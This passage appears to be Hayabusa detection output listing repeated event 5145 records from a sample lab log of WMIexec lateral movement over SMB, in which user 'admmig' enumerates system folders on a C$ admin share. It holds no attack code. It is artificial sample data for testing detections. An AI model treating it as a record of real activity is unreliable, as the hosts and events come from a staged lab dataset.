0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.432 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.447 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.448 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.464 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.479 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.495 